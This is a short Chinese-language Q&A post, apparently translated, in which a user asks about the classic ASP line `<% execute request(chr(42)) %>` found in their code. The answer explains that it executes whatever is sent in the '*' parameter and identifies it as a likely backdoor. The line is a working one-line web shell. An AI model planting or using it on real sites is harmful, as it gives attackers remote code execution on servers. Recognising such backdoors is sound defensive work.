我遇到了一些访问Request(chr(42))(如下)并执行它的代码。
<% execute request(chr(42)) %>
我似乎找不到 '*' 会返回什么,因为它似乎不是一个有效的QueryString变量名。
1 回答
2
在经典 ASP 中,您可以调用Request("some_key")它,它将返回Request.Querystring(GET) 或Request.Form(POST) 数据的“some_key”值。
chr(42)是一个有效的键,因此您可以调用该页面test.asp?*=command来执行某些操作。
execute是一个 vbscript/asp 函数,可让您将字符串作为 ASP 代码执行,与eval. 细节
更新前(不适用):
我只知道Server.Execute方法,它将执行一些其他的 ASP 页面。
总而言之,这似乎是您建议的一些黑客/后门。
于 2013-10-15T12:34:03.163 回答